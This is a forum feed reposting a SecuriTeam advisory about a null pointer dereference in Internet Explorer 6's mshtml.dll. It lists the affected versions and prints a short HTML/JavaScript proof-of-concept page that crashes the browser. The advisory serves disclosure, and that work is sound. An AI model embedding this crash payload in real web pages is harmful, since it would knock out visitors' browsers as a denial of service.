<![CDATA[Latest posts for the topic "MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net MS IE 6 Null Pointer Dereference Exploit (mshtml.dll) http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll) ------------------------------------------------------------------------ SUMMARY Microsoft Internet Explorer version 6 crashes when you open the attached HTML page, this is due to its attempt to dereference a NULL pointer. DETAILS Vulnerable Systems: * Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000 Advanced Server) * Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) Exploit: <!-- + Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day) + Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com) + Critical: Critical + Impact: MS Internet Explorer 6 -> Crash (Denial of Service) + Where: From remote + Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language) Windows 2000 Advanced Server (Korean Language) + Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server) Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) + Solution: Not Patched (zero-day) + Description: The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. this bug will crash when executing a 'for' scripts. + The following proof-of-concept is also available: <http://www.powerhacker.net/exploit/IE_NULL_CRASH.html> http://www.powerhacker.net/exploit/IE_NULL_CRASH.html --> Code:
<html>
 <head>
  <title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, 
RC_No1@gmail.com)</title>
 </head>
 <body>
  <script language='javascript'>
   var data = document['getElementById'];
   for(var key in data);
  </script>
 </body>
</html>
ADDITIONAL INFORMATION The original article can be found at: <hxxp://www.milw0rm.com/exploits/3272> hxxp://www.milw0rm.com/exploits/3272]]> /hvaonline/posts/list/6996.html#40703 /hvaonline/posts/list/6996.html#40703 GMT Re:MS IE 6 Null Pointer Dereference Exploit (mshtml.dll) /hvaonline/posts/list/6996.html#40704 /hvaonline/posts/list/6996.html#40704 GMT